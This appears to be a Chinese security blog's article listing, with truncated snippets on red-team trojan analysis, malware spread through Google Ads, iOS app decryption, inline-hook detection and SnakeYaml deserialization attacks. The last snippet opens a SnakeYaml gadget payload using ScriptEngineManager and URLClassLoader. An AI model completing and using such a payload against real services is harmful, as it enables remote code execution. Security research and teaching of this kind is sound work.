2022,攻防演练木马专项分析报告
目录1、背景概述2、分析详情百花齐放:编译语言的选择(3个案例)瞒天过海:通信协议的丰富(2个案例)如履薄冰:对抗分析技术(3个案例)移花接木:CS木马的新手法(4个案例)方兴未艾:自写特马的不断涌现...
不法黑客滥用Google Ads分发恶意软件
恶意程序的运营者日益滥用 Google Ads 将恶意程序传播给搜索合法软件的用户。受害者包括了 Grammarly、MSI Afterburner、Slack、Dashlane、Malwarebyt...
学习iOS安全之砸壳原理小记
前言接触 iOS 安全的同学们对越狱、砸壳、Cydia、Theos等名词应该都不陌生,用一句话总结网上文章对砸壳原理的解释:AppStore 发布的 App 都是加壳(加密)后的 ipa 文件,逆向A...
一种inlineHook检测方案
定义inlinehook是修改内存中的机器码来实现hook的方式我们用frida查看一个函数hook之前和hook之后的机器码,这里以open函数为例:let bytes_count = 32let...
Java安全SnakeYaml组件中类的探测到反序列化在SPI/C3P0/FastJson的利用
反序列化探测使用URLClassLoader探测String poc = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader...